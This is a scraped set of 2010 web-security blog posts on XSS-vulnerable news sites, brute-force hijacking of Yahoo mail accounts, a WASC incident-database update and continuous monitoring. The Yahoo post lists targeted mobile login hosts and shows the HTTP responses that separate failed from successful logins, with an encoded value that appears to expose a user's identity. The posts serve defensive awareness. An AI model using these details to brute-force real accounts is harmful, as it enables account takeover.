Arial, Helvetica, sans-serif; font-size: 12px; "><a href="/mirror/64429/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "></a><blockquote><a href="/mirror/64429/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">www.internetnews.com</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_1">XSS</span> vulnerability notified by <a href="/archive/author=nickhacks/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_2">nickhacks</span></a><br /><a href="/mirror/60694/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">search.news.cn</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_3">XSS</span> vulnerability notified by <a href="/archive/author=nicobar/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_4">nicobar</span></a><br /><a href="/mirror/64224/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">www.newsmill.se</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_5">XSS</span> vulnerability notified by <a href="/archive/author=Uber0n/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_6">Uber</span>0n</a><br /><a href="/mirror/62934/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">news.uchicago.edu</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_7">XSS</span> vulnerability notified by <a href="/archive/author=nopic01/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_8">nopic</span>01</a><br /><a href="/mirror/54437/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">www.pdenewsroom.state.pa.us</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_9">XSS</span> vulnerability notified by <a href="/archive/author=Mystick/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_10">Mystick</span></a><br /><a href="/mirror/53838/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_11">novinnews</span>.com</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_12">XSS</span> vulnerability notified by <a href="/archive/author=Pouya_Server/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_13">Pouya</span>_Server</a><br /><a href="/mirror/53593/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">www.newscast.co.uk</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_14">XSS</span> vulnerability notified by <a href="/archive/author=Viper.aT/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">Viper.<span class="blsp-spelling-error" id="SPELLING_ERROR_15">aT</span></a><br /><a href="/mirror/52640/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">www.healthcareitnews.com</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_16">XSS</span> vulnerability notified by <a href="/archive/author=skathgh420/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_17">skathgh</span>420</a><br /><a href="/mirror/52783/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_18">blognetnews</span>.com</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_19">XSS</span> vulnerability notified by <a href="/archive/author=GTADarkDude/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_20">GTADarkDude</span></a><br /><a href="/mirror/63605/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">search.cyclingnews.com</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_21">XSS</span> vulnerability notified by <a href="/archive/author=Rohit Bansal/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_22">Rohit</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_23">Bansal</span></a><br /><a href="/mirror/49858/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">news.president.am</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_24">XSS</span> vulnerability notified by <a href="/archive/author=By_Cyber/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">By_<span class="blsp-spelling-error" id="SPELLING_ERROR_25">Cyber</span></a><br /><a href="/mirror/58725/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">www.recentnews.co.uk</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_26">XSS</span> vulnerability notified by <a href="/archive/author=austinator/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_27">austinator</span></a><br /><a href="/mirror/51885/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">media.49abcnews.com</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_28">XSS</span> vulnerability notified by <a href="/archive/author=xylitol/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_29">xylitol</span></a><br /><a href="/mirror/54355/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">news.carnoc.com</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_30">XSS</span> vulnerability notified by <a href="/archive/author=xylitol/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_31">xylitol</span></a><br /><a href="/mirror/59211/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">news.onekoreanews.net</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_32">XSS</span> vulnerability notified by <a href="/archive/author=Woo/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">Woo</a><br /><a href="/mirror/55200/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">newshub.tucows.com</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_33">XSS</span> vulnerability notified by <a href="/archive/author=DaiMon/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_34">DaiMon</span></a><br /><a href="/mirror/58758/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">www.newsvoyager.com</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_35">XSS</span> vulnerability notified by <a href="/archive/author=TheBig/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_36">TheBig</span></a><br /><a href="/mirror/54531/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">www.hypernews.org</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_37">XSS</span> vulnerability notified by <a href="/archive/author=Mystick/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_38">Mystick</span></a><br /><a href="/mirror/62159/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">newsroom.pse.com</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_39">XSS</span> vulnerability notified by <a href="/archive/author=LostBrilliance/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_40">LostBrilliance</span></a><br /><a href="/mirror/56064/" target="_blank" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; ">news.mediamarkt.de</a> <span class="blsp-spelling-error" id="SPELLING_ERROR_41">XSS</span> vulnerability notified by <a href="/archive/author=zrok/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "><span class="blsp-spelling-error" id="SPELLING_ERROR_42">zrok</span></a></blockquote><a href="/archive/author=zrok/" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: rgb(43, 85, 162); text-decoration: none; font-weight: bold; "></a></span></div><div>Keep in mind that <span class="blsp-spelling-error" id="SPELLING_ERROR_43">XSS</span> vulnerabilities can be leveraged in many different types of attack outcomes. In this case, we are talking about Content Spoofing of news stories however an attacker may also use the same attack vectors to try and install <span class="blsp-spelling-error" id="SPELLING_ERROR_44">malware</span> onto victim's computers.</div><div><br /></div><div>Besides <span class="blsp-spelling-error" id="SPELLING_ERROR_45">XSS</span> vulnerabilities, Content Spoofing attacks can be carried out due to unauthorized access to web-based management interfaces. For example, there have been news stories of improperly configured proxy servers that allowed external clients to gain access to the the internal network. This in turn allowed them access to web-based news <span class="blsp-spelling-error" id="SPELLING_ERROR_46">submittal</span> applications. This is exactly what happened where <a href="http://www.zdnet.co.uk/news/networking/2002/07/15/usa-today-investigating-hack-attack-2119086/">hacker Adrian <span class="blsp-spelling-error" id="SPELLING_ERROR_47">Lamo</span> posted fake news stories</a> on Yahoo's website.</div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-87000097237738240672010-03-31T10:19:00.003-04:002010-03-31T11:34:53.702-04:00Hijacking Yahoo Email Accounts Update<i>Submitted by Ryan Barnett 03/31/2010</i><div><br /></div><div>There have been recent news reports of <a href="http://www.nytimes.com/2010/03/31/world/asia/31china.html">journalists' Yahoo email accounts being hacked</a>. Andrew Jacobs of the New York Times reports:</div><div><p></p><blockquote><p><i>In what appears to be a coordinated assault, the e-mail accounts of more than a dozen rights activists, academics and journalists who cover China </i><i>have been compromised by unknown intruders. A Chinese human rights organization also said that hackers disabled its Web site for a fifth straight day. </i></p> <p><i> The infiltrations, which involved Yahoo </i><i>e-mail accounts, appeared to be aimed at people who write about China and Taiwan, rendering their accounts inaccessible, according to those who were affected. In the case of this reporter, hackers altered e-mail settings so that all correspondence was surreptitiously forwarded to another e-mail address.</i></p></blockquote><p> So, how were these Yahoo email account broken into? The news article provides a possible scenario:</p><p><i></i></p><blockquote><i>Paul Wood, a senior analyst at the Symantec Corporation</i><i>, said a growing number of malignant viruses were tailored to specific recipients, with the goal of tricking them into opening attachments that would insert malware onto their computers. Mr. Wood said his company, which designs anti-virus software, now blocks about 60 such attacks each day, up from 1 or 2 a week in 2005. “They’re very well crafted and extremely damaging,” he said.</i></blockquote><i></i><p></p><p>Targeted malware may very well have been the attack vector here, however I can't help but to also think about the <a href="http://tacticalwebappsec.blogspot.com/2009/09/distributed-brute-force-attacks-against.html">Distributed Brute Force Attacks</a> that we are seeing against Yahoo accounts through the <a href="http://projects.webappsec.org/Distributed-Open-Proxy-Honeypots">WASC Distributed Open Proxy Honeypot Project</a>. Brute forcing login credentials is still quite an effective means of hijacking accounts. As I outlined in the other blog post, attacker's have found that they can target a web services URL to conduct their attacks without any restrictions such a CAPTCHAs. </p><p>Well, in addition to the web service authentication URLs, we are now also the attackers targeting mobile (WAP) authentication services. Here are some of the different mobile Yahoo subdomains being targeted:<br /></p><p></p><p><i></i></p><blockquote><p><i>in.wap.yahoo.com</i></p><p><i>mlogin2.mobile.re4.yahoo.com</i></p><p><i>mobile1.login.vip.sp2.yahoo.com</i></p><p><i>my.rf.wap.yahoo.com</i></p><p><i>ph.wap.yahoo.com</i></p><p><i>sushi2.mobile.ch1.yahoo.com</i></p><p><i>webgw1.mobile.re3.yahoo.com</i></p><p><i>webgw3.mobile.re3.yahoo.com</i></p></blockquote><p><i></i></p><div>When a client sends credentials and it is a failed auth attempt, it looks like this:</div><p></p><p></p><p><i></i></p><blockquote><p><i><span class="Apple-style-span" style="font-family:'courier new';">HTTP/1.1 302 Found</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Date: Wed, 31 Mar 2010 14:49:03 GMT</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Expires: Mon, 26 Jul 1997 05:00:00 GMT</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Cache-Control: private, no-store, no-cache, must-revalidate</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Set-Cookie: B=emj89nt5r6o6v&b=3&s=lo; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com</span></i></p><p><i><b><span class="Apple-style-span" style="font-family:'courier new';">Location: /p/login?.done=/p/&.pc=5135&.error=7&ignore=signin&ySiD=32CzS0e<span class="Apple-style-span" style="font-family: Georgia, serif; font-style: normal; font-weight: normal; "><i><b><span class="Apple-style-span" style="font-family:'courier new';">2khOZCLqXwuFj</span></b></i></span></span></b></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Connection: close</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Transfer-Encoding: chunked</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Content-Type: text/html; charset=utf-8</span></i></p><div><i><span class="Apple-style-span" style="font-family:'courier new';"><!-- sushi21.mobile.sp1.yahoo.com uncompressed/chunked Wed Mar 31 14:49:03 GMT 2010 --></span></i></div></blockquote><div><i></i></div><p></p><p>Notice that the Location header sends the user back to a login URL with parameters indicating that there was an error. In contrast, when a successful auth happens, the user is redirected to a different URL:</p><p> </p><p></p><p><i></i></p><blockquote><p><i><span class="Apple-style-span" style="font-family:'courier new';">HTTP/1.1 302 Found</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Date: Wed, 31 Mar 2010 14:48:46 GMT</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Expires: Mon, 26 Jul 1997 05:00:00 GMT</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Cache-Control: private, no-store, no-cache, must-revalidate</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Set-Cookie: B=derbda55r6o6e&b=3&s=ml; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';"><b>Location: /p/?.data=LnlpZCUzZFU4ZjZDNWZRZ25vb2VkX19lZy0tJTI2Lnl0cyUzZDIw</b></span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';"><b>MTAwMzMxMTQ0ODQ3JTI2LnlndCUzZEhlbGxvIEh1Z2glMjYueWludGwlM2R1cy</b></span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';"><b>UyNi55Y28lM2R1cyUyNi55ZW0lM2RkYXZpc19odWdoQHlhaG9vLmNvbSUyNi55<span class="Apple-style-span" style="font-family: Georgia, serif; font-style: normal; font-weight: normal; "><i><span class="Apple-style-span" style="font-family:'courier new';"><b>eW0lM2RkYXZpc19odWdoQHlhaG9vLmNvbSUyNi55bm0lM2RIdWdoIERhdmlzJTI</b></span></i></span></b></span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';"><b><span class="Apple-style-span" style="font-family: Georgia, serif; font-style: normal; font-weight: normal; "><i><span class="Apple-style-span" style="font-family:'courier new';"><b>2LnloaWQlM2RkYXZpc19odWdoJTI2LnlyZWclM2QxMDY1NzA0NDc4&.ys=XkVVQ</b></span></i></span></b></span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';"><b><span class="Apple-style-span" style="font-family: Georgia, serif; font-style: normal; font-weight: normal; "><i><span class="Apple-style-span" style="font-family:'courier new';"><b>zpv_oOsltCTiJwm3.c9zrQ-&ySiD=zmCzS9GqZrL1pVcmUygz</b></span></i></span></b></span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Connection: close</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Transfer-Encoding: chunked</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';">Content-Type: text/html; charset=utf-8</span></i></p><p><i><span class="Apple-style-span" style="font-family:'courier new';"><!-- sushi20.mobile.sp1.yahoo.com uncompressed/chunked Wed Mar 31 14:48:46 GMT 2010 --></span></i></p></blockquote><p><i></i></p><p></p><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i463.photobucket.com/albums/qq358/zlz_yeumaingannam_zlz/2bcycn7ddd8xsmb2dcid.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 232px; height: 520px;" src="http://i463.photobucket.com/albums/qq358/zlz_yeumaingannam_zlz/2bcycn7ddd8xsmb2dcid.jpg" border="0" alt="" /></a><br /><p>It is interesting to note that the hacker underground is keeping track of all of these different authentication servers and the various authentication mechanisms in use. Just do a google search for "<a href="http://www.google.com/search?hl=en&q=%22yahoo+servers+for+cracking%22&aq=f&aqi=&aql=&oq=&gs_rfai=">Yahoo Servers for cracking</a>" which will give you a huge list of users forums where hackers are listing both Yahoo authentication hosts and automated tools for brute forcing (such as the image on the right).</p><p>The lessons learned from this data is that there are many ways in which attackers may be able to hijack user's email accounts. For organizations attempting to defend against these types of attacks, it is critical that all authentication mechanisms are identified and proper access control is implemented (specifically if end users are allow to directly interact with it or if is supposed to be used only by other authorized partners).</p></div><div><br /></div><div><br /></div><div><br /></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-48028137734473866652010-03-30T09:02:00.002-04:002010-03-30T09:24:03.108-04:00WASC Web Hacking Incident Database Project Update<i>Submitted by Ryan Barnett 03/30/2010</i><div><br /></div><div><div>I wanted to share some exciting news with everyone. I have taken over as the Project Leader for the <a href="http://projects.webappsec.org/Web-Hacking-Incident-Database">WASC Web Hacking Incident Database (WHID) Project</a>. First of all I wanted to thank <a href="http://www.xiom.com/about/shezaf">Ofer Shezaf</a> for starting WHID and for all of the great work he has done with it. It is a tremendous resource for real-world web application security awareness as it helps to prioritize attacks/vulnerabilities that are currently being used by cyber-criminals to compromise sites. I am excited to keep it going and to hopefully increase its value to the community.</div><div><br /></div><div><b>Changes to WHID</b></div><div><ol><li>The WHID data has been uploaded to a new <a href="http://wasc-whid.dabbledb.com/publish/wasc-whid/7dedeab9-de3d-477b-8dde-c7cd58946c13/defaultwhidview.html">DabbleDB account</a> which will help to allow for multiple WHID authors. If you would like to participate in this capacity, please let me know and I will get you setup.</li><li>The project page has been updated to embed the DabbleDB data, with search filters, into the existing WHID Project page. This makes searching and filtering much easier. You can also access it directly <a href="https://wasc-whid.dabbledb.com/page/wasc-whid/dXhcaNXd">here</a>.</li><li>We also added an <b><i><a href="https://wasc-whid.dabbledb.com/page/wasc-whid/mWTwXOqA">Incident Entry Submittal Form</a></i></b> directly on the page so it will be easier for the community to send in links to web hack stories. This will then place the link in a queue and email me for a follow-up.</li><li>Lastly, we also added a new <a href="http://wasc-whid.dabbledb.com/publish/wasc-whid/7dedeab9-de3d-477b-8dde-c7cd58946c13/defaultwhidview.rss">RSS feed</a> and <a href="http://twitter.com/wascwhid">Twitter account</a> so you can keep track of WHID entries as they happen.</li></ol></div><div>If you have any comments about WHID or recommendations for making it more useful, please let me know.</div><div><br /></div></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-81275492395295470552010-03-29T08:09:00.010-04:002010-03-30T12:15:19.689-04:00Continuous Monitoring Highlighted in Recommended FISMA Changes<i>Submitted by Ryan Barnett 03/29/2010</i><div><br /></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">The SANS </span><span class="blsp-spelling-error" id="SPELLING_ERROR_0"><span class="Apple-style-span" style="font-size: medium;">Institute's</span></span><span class="Apple-style-span" style="font-size: medium;"> weekly </span></span><a href="http://www.sans.org/newsletters/newsbites/newsbites.php?vol=12&issue=24#sID200"><span class="Apple-style-span" style="font-family:arial;"><span class="blsp-spelling-error" id="SPELLING_ERROR_1"><span class="Apple-style-span" style="font-size: medium;">NewsBites</span></span><span class="Apple-style-span" style="font-size: medium;"> newsletter covered an important story</span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> last week with regards to proposed changes to the </span></span><em style="font-style: normal; "><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Federal Information Security Management Act</span></span></em><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> (</span></span><em style="font-style: normal; "><span class="Apple-style-span" style="font-family:arial;"><span class="blsp-spelling-error" id="SPELLING_ERROR_2"><span class="Apple-style-span" style="font-size: medium;">FISMA</span></span></span></em><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">) which was presented at a House subcommittee meeting on March 24. The most important change is a shift towards are more agile, real-time monitoring capability. Alan </span><span class="blsp-spelling-error" id="SPELLING_ERROR_3"><span class="Apple-style-span" style="font-size: medium;">Paller</span></span><span class="Apple-style-span" style="font-size: medium;">, Director of Research at the SANS Institute, </span><a href="http://oversight.house.gov/images/stories/Hearings/Government_Management/032410_Federal_Info_Security/Testimony_of_Alan_Paller_March_24_2010.pdf"><span class="Apple-style-span" style="font-size: medium;">stated the following in his testimony</span></a><span class="Apple-style-span" style="font-size: medium;">:</span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><div></div><blockquote><div><i><span class="Apple-style-span" style="font-size: medium;">One of the most important goals of any federal </span><span class="blsp-spelling-error" id="SPELLING_ERROR_4"><span class="Apple-style-span" style="font-size: medium;">cyber</span></span><span class="Apple-style-span" style="font-size: medium;"> security legislation must be to </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">enable the defenders to act as quickly to protect their systems as the attackers can </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">act. </span><b><span class="Apple-style-span" style="font-size: medium;">We call this continuous monitoring and it is single </span><span class="blsp-spelling-error" id="SPELLING_ERROR_5"><span class="Apple-style-span" style="font-size: medium;">handedly</span></span><span class="Apple-style-span" style="font-size: medium;"> the most important </span></b><span class="Apple-style-span" style="font-style: normal; "><i><b><span class="Apple-style-span" style="font-size: medium;">element you will write into the new law</span></b><span class="Apple-style-span" style="font-size: medium;">. Continuous monitoring enables </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">government agencies to respond quickly and effectively to common and new attack </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">vectors. The Department of State has demonstrated the effectiveness of this security </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">innovation. Most major corporations use it. This model is the future of federal </span><span class="blsp-spelling-error" id="SPELLING_ERROR_6"><span class="Apple-style-span" style="font-size: medium;">cyber</span></span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">security. As our response to attacks becomes faster and more automated, we will </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">take the first steps toward turning the tide in cyberspace, and protecting our </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">sensitive information.</span></i></span></i></span></i></span></i></span></i></span></i></span></i></span></i></span></i></span></i></span></i></span></i></span></i></span></i></span></i></span></i></span></i></div></blockquote><div><span class="Apple-style-span" style="font-family:Georgia, serif;"><span class="Apple-style-span" style="font-size: medium;"><br /></span><a href="http://1.bp.blogspot.com/_Z-tqVTd9fPI/SgMCAxX0VaI/AAAAAAAABUI/Ww-5b34gjgw/s400/verizon_2009_dbir_timespan.jpg"><img src="http://1.bp.blogspot.com/_Z-tqVTd9fPI/SgMCAxX0VaI/AAAAAAAABUI/Ww-5b34gjgw/s400/verizon_2009_dbir_timespan.jpg" border="0" alt="" style="float: right; margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 10px; cursor: pointer; width: 400px; height: 311px; " /></a><span class="Apple-style-span" style="font-size: medium;"><br /><br /></span><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Continuous Monitoring capabilities, not only for government but also the commercial sector, is absolutely critical for identifying attempted and actual compromises and conducting proper incident response. Proper real-time network security monitoring is woefully lacking and this claim is supported by the Verizon 2009 Data Breach Investigations report which found that "</span><b><i><span class="Apple-style-span" style="font-size: medium;">Breaches still go undiscovered and </span><span class="blsp-spelling-error" id="SPELLING_ERROR_7"><span class="Apple-style-span" style="font-size: medium;">uncontained</span></span><span class="Apple-style-span" style="font-size: medium;"> for weeks or months in 75 percent of cases.</span></i></b><span class="Apple-style-span" style="font-size: medium;">" This is mainly due to a lack or proper real-time continuous monitoring of network traffic.</span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Breach Security has seen these issues first hand with our </span><span class="blsp-spelling-corrected" id="SPELLING_ERROR_8"><span class="Apple-style-span" style="font-size: medium;">government</span></span><span class="Apple-style-span" style="font-size: medium;"> customers who want to protect their web applications. They are lacking lacking real-time visibility into their web data streams and are unaware of who is attacking them, how they are doing it and if and when they are successful. Web application firewalls give them them the visibility they need and the situational awareness required to identify and respond to real-time attacks. </span></span></div></span></div><div><span class="Apple-style-span" style="font-size: medium;"><br /></span></div><div><span class="Apple-style-span" style="font-size: medium;">Mr. </span><span class="blsp-spelling-error" id="SPELLING_ERROR_9"><span class="Apple-style-span" style="font-size: medium;">Paller</span></span><span class="Apple-style-span" style="font-size: medium;"> also recommends the use of the </span><a href="http://www.sans.org/critical-security-controls/"><span class="Apple-style-span" style="font-size: medium;">Consensus Audit Guidelines (</span><span class="blsp-spelling-error" id="SPELLING_ERROR_10"><span class="Apple-style-span" style="font-size: medium;">CAG</span></span><span class="Apple-style-span" style="font-size: medium;">)</span></a><span class="Apple-style-span" style="font-size: 